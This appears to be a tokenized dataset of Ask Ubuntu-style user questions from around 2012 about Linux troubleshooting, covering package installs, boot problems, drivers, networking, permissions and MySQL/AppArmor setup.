boot start sector end sector # of sectors id system /dev/sdb1 * 2,048 976,895 974,848 83 linux /dev/sdb2 978,942 379,883,519 378,904,578 5 extended /dev/sdb5 978,944 40,038,399 39,059,456 83 linux /dev/sdb6 40,040,448 372,070,399 332,029,952 83 linux /dev/sdb7 372,072,448 379,883,519 7,811,072 82 linux swap / solaris
218708	installing latest version of r-base	i have been unsuccessfully trying to install the latest version ( 2.15.2 ) of r-base . apparently , r package rcpp would not install for r version 2.14.1 - the version that installs for me . i am not sure what/how/where to change my installation attempts which appear below . please note that i am using ubuntu-12.04.1-server-i386 . ( 1 ) -- -- -- -- -- -- > the current installed version is r version 2.14.1 ( 2011-12-22 ) sudo apt-get install r-base reading package lists ... done building dependency tree reading state information ... done r-base is already the newest version . ( 2 ) -- -- -- -- -- -- > including version information does n't help : sudo apt-get install r-base=2.15.1-5ubuntu1 reading package lists ... done building dependency tree reading state information ... done e : version '2.15.1-5ubuntu1 ' for 'r-base ' was not found ( 3 ) -- -- -- -- -- -- - > changes based on cran ubuntu instructions from http : //cran.r-project.org/bin/linux/ubuntu/readme 3.1 : added to /etc/apt/sources.list deb http : //lib.stat.cmu.edu/r/cran/bin/linux/ubuntu quantal/ 3.2 : update and install sudo apt-get update sudo apt-get install r-base reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : r-base : depends : r-base-core ( > = 2.15.2-1quantal2 ) but it is not going to be installed depends : r-recommended ( = 2.15.2-1quantal2 ) but it is not going to be installed recommends : r-base-html but it is not going to be installed e : unable to correct problems , you have held broken packages .
218709	ubuntu gets slower by the day	ive noticed that ubuntu has been getting slower and slower to boot , launch programs , etc . i installed 12.04 about 4 months ago , now 12.10 , running on a quad-core q8300 intel , 4gb ram , and an 80gb wd ide drive . for some reason ( ever since 11.04 ) , ive noticed after installation , the speed is good . the longer i have the os installed , every bootup gets slower and slower , launching programs get slower , frame rates change radically ( onboard gf9400 gets anywhere from 60fps down to 12 in worst cases ) . i would think maybe the hd is the issue , however i installed 11.10 on a 160gb sata , and the same thing occurred . looking at system resources , i 'm holding steady at 1gb memory usage ( i have 4gb , but it 's actually showing 3.6gb , dunno why ) , no swap usage , and using right around 4 % on cpu currently . hd capacity is only 28 % used . has anyone else ran into this issue ? i love ubuntu to death , but using other distros other than ubuntu , i dont have this problem .
218711	how does ubuntu 's application menu differ from mac os	as the question says , this is what i was asked today . since i do not plan to buy any mac any time soon , maybe somebody that is/was using a mac osx would be kind to answer . how does the application menu ( also known as global menu by some ) differ ( or be the same ) from an end user perspective .
218716	ubuntu 12.04 startup is slow and dmesg output seems to lose several seconds	i use ubuntu on dell inspiron n4050.i have upgraded to ubuntu 12.04 from 10.04 . but now i find the system startup is a little slow and plymouth only show purple screen without logo during startup . when i use dmesg , it shows such messages : [ 2.497750 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 2.603028 ] usb 2-1.6 : new high-speed usb device number 3 using ehci_hcd [ 2.715538 ] initializing usb mass storage driver ... [ 2.715594 ] usbcore : registered new interface driver usb-storage [ 2.715596 ] usb mass storage support registered . [ 21.317843 ] adding 2000892k swap on /dev/sda5 . priority : -1 extents:1 across:2000892k [ 21.323724 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 21.391450 ] udevd [ 431 ] : starting version 175 i wonder what it is doing between 2 second and 21 second . is it related to being so slow ? i tried bootchart . it gave me a complex picture . sorry i ca n't post it here . https : //docs.google.com/open ? id=0b_u5quefrft_a2k1wezpoeu1mm8 while ubuntu is booting , i also noticed that it appears : /tmp is not ready or present and sometimes follows *stop saving kernel messages . is this the reason dmesg lost output ?
218721	problem with bluetooth in ubuntu 12.10	i am a new user of ubuntu and i am really fascinated by its performance . coming to the question , i am facing some problems with the bluetooth connection . when i connect my mobile with the computer through bluetooth , and then click on 'browse device ' , the phone folder opens , but after 1 second , the folder gets closed by itself . but i am able to connect the internet through my phone . can anyone help me ?
218724	random memory corruption going undetected by memtest86	thinkpad t520 ; ubuntu 12.04.1 lts ; 3.2.0-33-generic ; 16gb of ram . memtest86+ ran for 26 hours , 9 passes , no errors . booted into `` recovery mode '' : ran fsck all filesystems - no errors ; `` check all packages '' - no errors . apparent random memory corruption : perl/r/chrome segfault every now and then , seemingly at random ; sort ( 1 ) produces corrupt unsorted files . what could be possibly wrong and how do i debug it ?
218725	why ubuntu do n't support 'sh example.sh ' command ?	my question is simple . why ubuntu do n't support sh example.sh command ? it 's more convenient than cd $ wd ; ./example.sh and add path in some situation . login.sh ~/bin/logmitgw.sh -i 4564646 dfdsfsdf logmitgw.sh some code when i 'm running sh ~/bin/login.sh it print sh : 0 : ca n't open ~/bin/login.sh ls -l ~/bin/login.sh -rwxrwxr-x
218728	connection timeout when accessing github	i have exactly the same problem as described here : http : //stackoverflow.com/questions/12849986/connection-timeout-when-accessing-github so i 'll just copy & paste : i have some weird problems . when i try to log in my github account , i get a `` net : :err_empty_response '' error . i tried with chrome , firefox and opera . in firefox , if a clean the cache and offline data , it works for a while . then i can log in , but i still ca n't create a github repository , even if i clear the cache again . my friend , in the same network , with windows , can do whatever he wants on github 's web site , but i ca n't . i tried many dns servers , i tried not to set it ( my friend does n't ) , but it 's still not working . my os : ubuntu x64 12.04 ideas , please . and thanks . also , i can clone any repo but i ca n't push . i had to change to https : //codeplane.com/ due to this problem , but i want to understand why it happens . edit : i could clone one repo , but the other one just hangs at this point : felipelalli @ felipelalli-studio-xps-8100 : ~/wa $ git clone git @ github.com : felipelalli/micaroni.git cloning into 'micaroni ' ... remote : counting objects : 5238 , done . remote : compressing objects : 100 % ( 3257/3257 ) , done . receiving objects : 92 % ( 4839/5238 ) , 43.29 mib | 902 kib/s any push hangs like this : master ! fml.eti.br > push counting objects : 23 , done . delta compression using up to 4 threads . compressing objects : 100 % ( 15/15 ) , done . writing objects : 100 % ( 19/19 ) , 4.25 kib , done . total 19 ( delta 3 ) , reused 0 ( delta 0 ) edit 2 : i format my pc and i have reinstalled ubuntu , but the problem keeps the same . so , it eliminates any problem with installations or updates . i have a dell studio xps . edit 3 : i pay 4 bitcoin if anyone solve my problem . just put your public address together . edit 4 : when i try to push , after a few minutes , i receive this message : felipelalli @ felipelalli-studio-xps-8100 : ~/wa/fml.eti.br $ git push counting objects : 26 , done . delta compression using up to 4 threads . compressing objects : 100 % ( 18/18 ) , done . writing objects : 100 % ( 22/22 ) , 4.48 kib , done . total 22 ( delta 4 ) , reused 0 ( delta 0 ) write failed : broken pipe fatal : the remote end hung up unexpectedly fatal : the remote end hung up unexpectedly
218733	crron job not running properly	crontab runs my script but file that are fetched are of 0 kb and when i am running my script scheduled by own i.e ./getmsc.sh $ 1 $ 2 its running and files are also fetched please suggest me why this is hapeening ...
218734	triple boot question	i have successfully set up a a win7 , win8 and ubuntu 12.10 system . windows 8 and ubuntu are located on the same ssd , while windows 7 is located on another ssd . all went great and i can continue playing around with all 3 os 's . my only annoyance is , while restarting , windows 7 boot loader runs first . if i select ubuntu in the win7 manager it then runs grub2 and asks me to select an os . i used easy bcd to add entries into win8 's boot manager and was hoping to just use that one . i installed ubuntu 's loader on to its own partition . any suggestions to just use win8 loader and still be able to choose between all 3 ?
218738	hardware problem	guys i need help to recover my external hard disk . im using segate freeagent go 320gb hdd . recently i tried to format it using command line in win7 , but accidentally i removed the hdd before the format is complete and i can not open it and i tried to recover data using as many software 's as i can but no use i have max of 25000 bad sectors . can i still recover my hdd ? is there any way to recover my hdd with max bad sectors using linux ?
218740	how to establish a pppoe connection from terminal	i just had ubuntu installed on my computer . the wired internet connection requires username and password . i followed the steps that i saw on google , by using “sudo pppoeconf”， but it told me `` unable to complete pppoe discovery '' , what should i do ?
218741	what is the issue between vlc and firefox in ubuntu 12.04 ?	in ubuntu with the xfce interface when i have vlc loaded and attempt to load firefox the video freezs and loops for almost a minute . i have a 64 bit amd with 2 gb of ram . i am also running a nvidia graphics card with 128 mb of ram . i have never had this issue until i updated to 12.04 . any ideas ? i thought it might be a problem with the video driver and the flsh plugin maybe ?
218743	xubuntu 12.10 livecd freeze	i have an issue about the installation of xubuntu 12.10 ( boot usb , boot cd ) , the boot run but it freeze in the first screen ( xubuntu logo ) , and i have to restart the laptop manually . i have read that maybe is an error of hardware : my specs : dell studio 1558 ( current ubuntu 11.10 ) 00:00.0 host bridge : intel corporation core processor dram controller ( rev 18 ) 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 06 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 06 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 06 ) 00:1c.3 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 4 ( rev 06 ) 00:1c.4 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 5 ( rev 06 ) 00:1c.5 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 6 ( rev 06 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 4 port sata ahci controller ( rev 06 ) 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) 00:1f.6 signal processing controller : intel corporation 5 series/3400 series chipset thermal subsystem ( rev 06 ) 03:00.0 network controller : broadcom corporation bcm43224 802.11a/b/g/n ( rev 01 ) 06:00.0 sd host controller : ricoh co ltd mmc/sd host controller ( rev 01 ) 06:00.1 system peripheral : ricoh co ltd memory stick host controller ( rev 01 ) 06:00.2 system peripheral : ricoh co ltd device e852 ( rev 01 ) 06:00.3 firewire ( ieee 1394 ) : ricoh co ltd firewire host controller ( rev 01 ) 08:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 )
218744	installation problem . read-only file system ?	when i was installing , i got this error from ubuntu . ( dialog ) the installer encountered an error copying files to the hard disk : [ errno 30 ] read-only file system : '/target/tmp' this is often due to a faulty hard disk . it may help to check whether the hard disk is old and in need of replacement , or to move the system to a cooler environment .
218747	can i recover work from a mypaint session that crashes ?	i was saving a piece of work i had worked on for 2 hours . after i saved it my computer shut off when i got it back up and running i try to open my drawing and this happens . traceback ( most recent call last ) : file `` /usr/share/mypaint/gui/filehandling.py '' , line 306 , open_cb ( self= < gui.filehandling.filehandler object > , action= < gtk.action object at 0x8c44054 ( gtkaction at 0x89d1dc0 ) > ) dialog.hide ( ) self.open_file ( dialog.get_filename ( ) .decode ( 'utf-8 ' ) ) finally : variables : { 'decode ' : ( none , [ ] ) , 'dialog.get_filename ' : ( 'local ' , < built-in method get_filename of gtk.filechooserdialog object at 0x955a43c > ) , 'self.open_file ' : ( 'local ' , < bound method filehandler.wrapper of < gui.filehandling.filehandler object at 0x8c30dac > > ) } file `` /usr/share/mypaint/gui/drawwindow.py '' , line 43 , wrapper ( self= < gui.filehandling.filehandler object > , *args= ( u'/home/jen/icyblue.ora ' , ) , **kwargs= { } ) try : func ( self , *args , **kwargs ) finally : variables : { 'self ' : ( 'local ' , < gui.filehandling.filehandler object at 0x8c30dac > ) , 'args ' : ( 'local ' , ( u'/home/jen/icyblue.ora ' , ) ) , 'func ' : ( 'local ' , < function open_file at 0x8bda844 > ) , 'kwargs ' : ( 'local ' , { } ) } file `` /usr/share/mypaint/gui/filehandling.py '' , line 227 , open_file ( self= < gui.filehandling.filehandler object > , filename=u'/home/jen/icyblue.ora ' ) try : self.doc.model.load ( filename ) except document.saveloaderror , e : variables : { 'self.doc.model.load ' : ( 'local ' , < bound method document.load of < lib.document.document instance at 0x8c30e2c > > ) , 'filename ' : ( 'local ' , u'/home/jen/icyblue.ora ' ) } file `` /usr/share/mypaint/lib/document.py '' , line 284 , load ( self= < lib.document.document instance > , filename=u'/home/jen/icyblue.ora ' ) try : load ( filename ) except gobject.gerror , e : variables : { 'load ' : ( 'local ' , < bound method document.load_ora of < lib.document.document instance at 0x8c30e2c > > ) , 'filename ' : ( 'local ' , u'/home/jen/icyblue.ora ' ) } file `` /usr/share/mypaint/lib/document.py '' , line 450 , load_ora ( self= < lib.document.document instance > , filename=u'/home/jen/icyblue.ora ' ) tempdir = tempfile.mkdtemp ( 'mypaint ' ) z = zipfile.zipfile ( filename ) print 'mimetype : ' , z.read ( 'mimetype ' ) .strip ( ) variables : { 'zipfile.zipfile ' : ( 'global ' , < class zipfile.zipfile at 0x8863b6c > ) , 'z ' : ( none , [ ] ) , 'filename ' : ( 'local ' , u'/home/jen/icyblue.ora ' ) } file `` /usr/lib/python2.7/zipfile.py '' , line 710 , __init__ ( self= < zipfile.zipfile instance > , file=u'/home/jen/icyblue.ora ' , mode='r ' , compression=0 , allowzip64=false ) if key == 'r ' : self._getcontents ( ) elif key == 'w ' : variables : { 'self._getcontents ' : ( 'local ' , < bound method zipfile._getcontents of < zipfile.zipfile instance at 0x95629ec > > ) } file `` /usr/lib/python2.7/zipfile.py '' , line 744 , _getcontents ( self= < zipfile.zipfile instance > ) try : self._realgetcontents ( ) except badzipfile : variables : { 'self._realgetcontents ' : ( 'local ' , < bound method zipfile._realgetcontents of < zipfile.zipfile instance at 0x95629ec > > ) } file `` /usr/lib/python2.7/zipfile.py '' , line 759 , _realgetcontents ( self= < zipfile.zipfile instance > ) if not endrec : raise badzipfile , `` file is not a zip file '' if self.debug > 1 : variables : { 'badzipfile ' : ( 'global ' , < class 'zipfile.badzipfile ' > ) } badzipfile : file is not a zip file if there is any way i can retrieve my drawing please assist me for i do not know how to fix this problem , thank you ubuntu forums !
218749	how can i check if two directory are in the same partition in ubuntu	i forget whether i have mounted / and /boot to the same partition in my ubuntu 10.04 . what command can i use to check it out ? thank you very much !
218755	how to disable the update manager popup ?	i configured this : automatically check for updates : never but the update manager keeps poping up against my wishes , i have no control . i feel like i 'm using windows again . i want to be able to install updates from time to time , manually . what can i do ?
218760	connection refused when connecting droidcam using adb	i have installed droidcam on my ubuntu 12.10 according to the procedure mentioned on its website . but try to connect my android to with droidcam using adb connection i am getting connection refused os : ubuntu 12.10 android : 2.3 mobile : samsung galaxy ace ( gt-s5830 )
218762	speakers still on when headphones are present ( realtek alc 262 )	i have a fujitsu siemens laptop lifebook e8110 with a realtek alc 262 soundcard on it . it worked fined with ubuntu 10.04 , but since i upgraded to the 12.04 version , there is a red light in the audio jack plug and sound still comes out from the speakers when i plug earphones in . very inconvenient , especially when working at the library . could anyone please help ?
218763	no menues orlauncher after upgrade to 12.10	i have a system having run plain ubuntu for 4-5 years . all updates have been installed at availability and worked nice . after upgrade to 12.10 , i am without menus and launchers . no window borders and no possibilities for resizing or moving windows . launching 'ccsm ' i see an error saying something like : ca n't write - dconf channel is closed .
218765	i ca n't control my brightness in hp compaq 6710s	im new in ubuntu , the problem is my laptop brightness change after few seconds and i have tried to remove `` dim light to save power '' but it does n't work , please help me because it disturb my works . i can not control the brightness . also my graphic card says `` unknown '' processor- intel® core™2 duo cpu t5470 @ 1.60ghz × 2 32bit with thanks . apollo
218769	stop ubuntu from reading a drive automatically	i 'm running my laptop using ubuntu 12.04 on a usb hdd as the laptop 's hdd has failed . whenever i boot or do a grub update etc , it takes forever because it scans for the failed drive about 20 times and takes ages for each scan . is there a way to disable the automatic scanning but still be able to manually mount one of the working partitions on the drive ? thanks chris
218771	how to stop windows from moving past the edge of a workspace ?	i would like to stop windows from entering into neighbouring workspaces . i would like each window to be self contained inside the current workspace . also , how can i stop windows from going underneath the unity bar ? thank you .
218773	no power notifications with i3wm	i use ubuntu 12.10 , but changed to the i3 window manger . it works great , but i do not get the normal `` low power '' notification . notify osd works as expected ( i tested it per notify-send ) . how can i activate low power notifications ? afaik ubuntu uses the gnome-power-manager ( for power notifications ) , but this application is n't installed yet.. this is strange because if i login with unity as wm anything works !
218775	drivers for msi z77ma-g45	i just purchased this motherboard ( along with a core i5-3570 cpu ) . the guy in the shop says it will work fine with linux , and a search on the web shows that some people are indeed using it , but the msi website only has drives for windows . any idea where i might get the linux drivers ?
218778	embedded .swf file in .pfd-ubuntu 10.04	i have just finished a presentation in latex . in this very .pdf file i have included a .swf animation ( done with adobe flash cs5 in windows ) which starts when you click on it . while i have already installed a relevant player ( swfdec flash player ) neither document viewer nor okular are able to reproduce it . i tried with my player to make sure that the file is not corrupted and the result was that it can be produced . i tried the same .pdf file in windows using adobe reader and there is no problem there . the embedded file can be reproduced with no problem . so i thought of installing adobe in ubuntu . i tried there to see if the problem was solved . things got a bit better . adobe could understand that there is something there , so when clicked i got a message that i had to get the proper player . when i clicked on a relevant button i expected to open my browser in a player 's page . instead nothing happened . if i place my mouse 's cursor next to the space that defines my animation the is a `` message '' stating `` media file ( application/x-shockwave flash ) '' . the next step was to install adobe flash player , but i could n't find the standallone player ; only the browser 's plugs ... how can i get this .swf file play in pdf ?
218783	`` the volume boot has only 0 bytes disk space remaining ''	after a recent update , i 'm getting an alert saying : the volume boot has only 0 bytes disk space remaining but my computer has plenty of hd space free . does anyone know how i resolve this . ( if its relevant , i 'm using the whole disk encryption feature of the alternate install image for ubuntu 12.04 ) .
218787	another apparmor / mysql wont install	i am trying to config another instance of mysql on my present but i ca n't mysql_install_db -- user=mysql -- datadir=/var/lib/mysql2 installing mysql system tables ... error : 1005 ca n't create table 'db ' ( errno : 13 ) 121118 15:25:12 [ error ] aborting 121118 15:25:12 [ note ] /usr/sbin/mysqld : shutdown complete installation of system tables failed ! examine the logs in /var/lib/mysql2/ for more information . you can try to start the mysqld daemon with : shell > /usr/sbin/mysqld -- skip-grant & and use the command line tool /usr/bin/mysql to connect to the mysql database and look at the grant tables : shell > /usr/bin/mysql -u root mysql mysql > show tables try 'mysqld -- help ' if you have problems with paths . using -- log gives you a log in /var/lib/mysql2/ that may be helpful . please consult the mysql manual section 'problems running mysql_install_db ' , and the manual section that describes problems on your os . another information source are the mysql email archives available at http : //lists.mysql.com/ . please check all of the above before mailing us ! and remember , if you do mail us , you must use the /usr/scripts/mysqlbug script ! syslog : : kernel : [ 6723.794523 ] type=1400 audit ( 1353231920.455:324 ) : apparmor= '' denied '' operation= '' mknod '' parent=6840 profile= '' /usr/sbin/mysqld '' name= '' /var/lib/mysql2/mysql/db.frm '' pid=6879 comm= '' mysqld '' requested_mask= '' c '' denied_mask= '' c '' fsuid=115 ouid=115 below is the config : # vim : syntax=apparmor # last modified : tue jun 19 17:37:30 2007 # include < tunables/global > /usr/sbin/mysqld { # include < abstractions/base > # include < abstractions/nameservice > # include < abstractions/user-tmp > # include < abstractions/mysql > # include < abstractions/winbind > capability dac_override , capability sys_resource , capability setgid , capability setuid , network tcp , /etc/hosts.allow r , /etc/hosts.deny r , /etc/mysql/*.pem r , /etc/mysql/conf.d/ r , /etc/mysql/conf.d/* r , /etc/mysql/*.cnf r , /usr/lib/mysql/plugin/ r , /usr/lib/mysql/plugin/*.so* mr , /usr/sbin/mysqld mr , /usr/share/mysql/** r , /var/log/mysql.log rw , /var/log/mysql.err rw , /var/lib/mysql/ r , /var/lib/mysql/** rwk , /var/log/mysql/ r , /var/log/mysql/* rw , /var/run/mysqld/mysqld.pid w , /var/run/mysqld/mysqld.sock w , /run/mysqld/mysqld.pid w , /run/mysqld/mysqld.sock w , /var/log/mysql2.log rw , /var/log/mysql2.err rw , /var/lib/mysql2/ r , /var/lib/mysql2/* rw , /var/run/mysqld/mysqld2.pid w , /var/run/mysqld/mysqld2.sock w , /run/mysqld/mysqld2.pid w , /run/mysqld/mysqld2.sock w , /sys/devices/system/cpu/ r , # site-specific additions and overrides . see local/readme for details . # include < local/usr.sbin.mysqld > }
218796	ca n't make unity launcher appear	i have ubuntu 12.10 and i want to make unity launcher to auto-hide but when it hides it does n't appear again unless i press the start button . should i reinstall unity through terminal ? i do n't have any updates and the fastest speed and sensivity did n't work .
218797	cant connect to my ssh remotely	i have ubuntu 12.04 and i am trying to connect to my ssh server remotely , i get authentication denied because the password is incorrect . however , when i connect to my machine from my local network i.e. , 192.168.1.101 and i use the same exact password i used when logging remotely , i connect to my ssh machine correctly .. .any help with that ? ?
218798	vpn - `` add '' button is not active !	when i open network connections window , everything is ok but in the vpn tab . nothing is active there , even the add button . i need to make a pptp connection , but i have no idea how . here 's the pictures of network connections tabs : http : //www.use.com/25186c67336ee527642b days ago i was running lubuntu 11.10 and there was no problem , but in 12.10 i found this problem .
218799	hdmi audio not working on ubuntu 12.10	i have an nvidia geforce and want to send audio output to my television when attaching it via hdmi.. how can i do it ? thanks in advance well ... am using an thomson television and have tried with several desktop envirorments ...
218811	stuck on ubuntu screen during installation of 12.10	from 12.04 i changed to win 8 consumer preview and now i want to go to 12.10 , however i cant seem get past the ubuntu loadingscreen ( with the dots going from white to yellow etc . ) it has taken more then an hour now and all my dvd drive does is speed up and slow down every 3 seconds . so i tried it again , but nothing changed im stuck on the same spot . what could cause this problem ? and even better , how do i solve it ? edit : tryed to install 12.04 from a live cd a had lying around work like a charm . and i found out my lan port doe n't function so there is no internet connection , could this be part of the problem ? tryed to instal 12.10 once more and it again stopped in the loading screen .
218813	a nice looking twitter crawler widget and a feed crawler widget ?	i am a heavy twitter user and would want a twitter crawler widget that will auto update and keep showing tweets as a widget on the home screen . i use gwibber , polly etc , but they are twitter clients ... not twitter crawler widgets . i also use feeds a lot , so would like any feed crawler widget to ... preferably a google reader client . any suggestions ? thankyou !
218815	12.04-my default python version changed to 2.5	long ago i downloaded and installed python2.5 ( ./configure , make and make install ) in my system ... .. now every time i type the command python -- version i get python 2.5.4 is there any way i could return my default python to 2.7 ? ? ? ?
218819	i installed 64 bit ubuntu with wubi but i need to reinstall 32 bit version instead .	i do n't need to save data or anything but i 'm aware that , because i used wubi , it has partitioned the hard drive in ways that i do n't understand and i do n't think i can keep making more and more partitions . the installation was the latest version ( 12.10 ) . i 'm running an hp mini 210 with an atom processor and a relatively small hdd ( 215gb with 81gb free ) . i know that hp already partition the drives in these things in strange ways and also that the first ubuntu installation did the same thing , so i 'm running out of space . does anyone know the best way to do this , ie : reinstall a 32 bit version in the same partition that the 64 bit installation used ? i just wanted to make this puny little netbook run faster , but there 's not much performance difference and i 'm sure the 32 bit ubuntu would help . thanks in advance guys !
218823	windows-manger not working ? i ca n't see the maximize , minimize and close buttons	i did something that i do n't know and for some reason now i ca n't click the maximize , minimize and close buttons even resize the window , the title bar just fixes at the top without these buttons and i ca n't move the window too . what should i do to be able to see the title bar with the buttons again ? edit : what i want the window is look like this not the above one .
218825	cant start ubuntu 3d after installing the nvidia drivers	i just performed a clean install of ubuntu 12.04 , installed the `` experimental nvidia drivers '' from `` additional drivers '' screen . even if i choose `` ubuntu '' when logging in ubuntu 2d runs . i have geforce 540m . i dont know if i gave enough information but there is my problem . thanks in advance ! note : english isnt my native language so please excuse grammar mistakes .
218827	ubuntu updating error . something with internet ?	everytime when i 'm trying to update ubuntu i always get these errors i hate so much . w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead . and its says that there might be something wrong with the internet connection but my internet connection is perfect . can anyone help me please ? : ) thanks , sorry for bad english : )
218832	no software manager on ubuntu gnome remix fix ?	i have just installed ubuntu gnome remix 12.10.1 and i when i first booted i ran the software manager and then went to the software updater to install updates . after the reboot , i can no longer find the software manager . i can see the updater when i search software but no manager . how can i get it back ?
218833	ubuntu 12.10 ca n't find my creative bluetooth speaker ( d200 )	i hope someone can help . i 'm fairly new to ubuntu . i recently bought a bluetooth speaker ( creative d200 ) . when i search for bluetooth devices on my laptop ( gazelle professional from system76 . with intel centrino advanced-n 6235 - 802.11a/b/g/n wireless lan + bluetooth combo module . ) my speaker will not show up . i know my speaker works , since i can connect it to my phone . i also know that bluetooth works on my laptop as i can find my phone with it . however , my laptop can not find my speaker . i have tried with blueman and the standard bluetooth manager many many times . i wondered if i need some sort of driver or if anyone has fixed this same problem . thanks , declan
218835	make environment variable accessible to application	in order to get latex to work , i have set the environment variable texinputs , which includes a path to certain inputted files . it works fine if i 'm calling latex ( or rubber , or pdflatex ) from the shell , but if i try to use it from within the gedit plugin , it does n't recognise that variable . how can i set an environment variable such that it is used by applications and not just the shell ?
218836	how to open multiple instances of the bash terminal ?	under ubuntu 10 i could easily open as many terminal instances as i needed , and i often need 6 or more . how can i do that in ubuntu 12 ? when are they going to fix the bug that restricts me to only one ?
218838	is it possible yet to synchronise music to an iphone running ios 5/6 ?	is it possible yet to synchronise music to an iphone running ios 5/6 ? i tried it in the ubuntu 12.10 ( quantal quetzal ) live environment , but i did n't have any luck with banshee or rhythmbox . is there some way to do it ?
218841	wireless acting strange lately	lately my home wireless network has been acting very strange under ubuntu 12.04 . when i 'm on the wireless menu at the top of the screen and i try to connect to my wireless it will give me a total of 11 options for which of my networks i want to choose . for example `` thejoebocops wifi '' '' thejoebocops wifi 1 '' '' thejoebocops wifi 2 '' all the way down to `` thejoebocops wifi 10 '' then when i 'm connected to on of the 11 the connection only lasts for about two minutes before downloads stop and i cant refresh the page . it used to work fine and it still does on the guest account , my bt5 partition and every other device in the house , but for its just stopped ! all help will be appreciated
218843	how to enable lightdm as lock-screen in ubuntu 12.10 ?	how to set lock-screen to lightdm logon ? now the lock screen is ugly . i googled and said it was carried into ubuntu 12.04 already . but i ca n't found this feature even in 12.10 now . anyone can help or explain ?
218845	locked out of drive on ubuntu server	i was trying to delete some torrents that i had downloaded with transmission-daemon and was unable to from my samba share on windows due to transmission 's default file creation permissions . i figured the best solution was to sudo chmod -r 0777 /media/storage ( my drive with samba ) but apparently not . this locked both my windows user and my user on my ubuntu server out of the drive completely , with a message saying ls : can not access /media/storage : permission denied . i am able to login as root with sudo bash and make changes however i am uncertain as to how to make my drive accessible again . doing a ls -ld on the directory shows drwsrwsrwx 39 root root 4096 nov 17 21:20 /media/storage . i have also done a : sudo chown -r [ username ] : [ group ] /media/storage and a sudo chmod -r u+rw /media/storage . both commands executed without errors but had no good effect . i am running ubuntu-server 12.10 so no gui available . any ideas ?
218847	recover partition after gparted resizing interrupted by unexpected shutdown	as i was resizing my partitions using gparted , my laptop battery ran out , and the process was interrupted . now , i am unable to mount the partition which i was trying to resize . i get the following error when i click to mount the partition on nautilus : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sda3 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so how can i go about recovering my data ? is there a safe way to attempt to force-mount the partition in question ? any help towards recovering my data is sincerely appreciated .
218848	gnome shell with user theme does n't show notifications properly	i 'm using gnome shell with user theme , and all notifications appear transparent and with no text , only icon appears . i tried shell osd extension too ( https : //extensions.gnome.org/extension/243/shell-osd/ ) and nothing happened . is someone else experiencing this ? this is not the only theme i tried ...
218850	how to setup tl-wr1043nd router on 12.04	i 've recently acquired the above router and want to give it a go . problem is , when ? i go to the tp-link website to download the 'easy setup ' software there 's no version available for linux . anyone know how i can set the router up without the 'easy setup ' software - please bear in mind that i 'm a linux noob and know virtually nothing about routers and/or networking !
218854	how to set new value for existing environmental variable	i have a environmental variable called `` path '' which has a value , now i want to append a new value to the existing value of a variable `` path '' and to set it permanently .
218856	repository for kdevelop ( > =4.4.x ) ?	i need to get around a regression in the new kdevelop ( 4.3.90 ) which is supposedly fixed in ( 4.4.1 ) but i can not find a ppa ( or other repository ) . i would really rather not compile from source . does someone have a source for an up to date repo for kdevelop ?
218857	ubuntu 12.10 not booting on lenovo z580 with windows 7	i have windows 7 x64 installed but after installing ubuntu 12.10 , it asks me to restart but the grub loader doesnt even show up , directly boots into windows what can i do for that ? ?
218860	where is my grub menu after updating ubuntu 10.04	i updated ubuntu 10.04 and now it auto-boots to the new kernel . i want to boot an older kernel but the boot menu is missing ?
218865	lenovo u410 ultrabook ubuntu support	i 'm planing to buy a new laptop in some time . especially i 've been looking into ultrabooks , the lenovo u410 looks quite good for its pricing . how is ubuntu supported on this ultrabook ? i will have ubuntu only probably so the problem about dual os on this laptop should be solved . do the sound , battery life , wireless , quick booting + other stuff work like they should on an ultrabook ?
218870	lubuntu 12.10 wth kernel 3.6.7 does not have video on skype	i have compiled newest stable kernel for my lubuntu 12.10 and i am wondering , why i have no video while i am phoning with skype . in settings of skype i could setup the microfon of my microsoft webcam only , but i have no video . so other people can hear me on skype , but the do n't see me . i have installed cheese , and i do n't see there video , too . now my question : how to install webcam-driver ? regards polix
